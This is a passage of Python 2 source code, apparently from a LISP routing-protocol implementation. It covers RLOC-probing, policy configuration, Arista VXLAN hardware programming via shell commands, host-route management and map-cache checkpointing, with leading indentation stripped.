if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
gleaned_eid, do_probe = lisp_allow_gleaning(eid, parent_rloc)
if (gleaned_eid and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
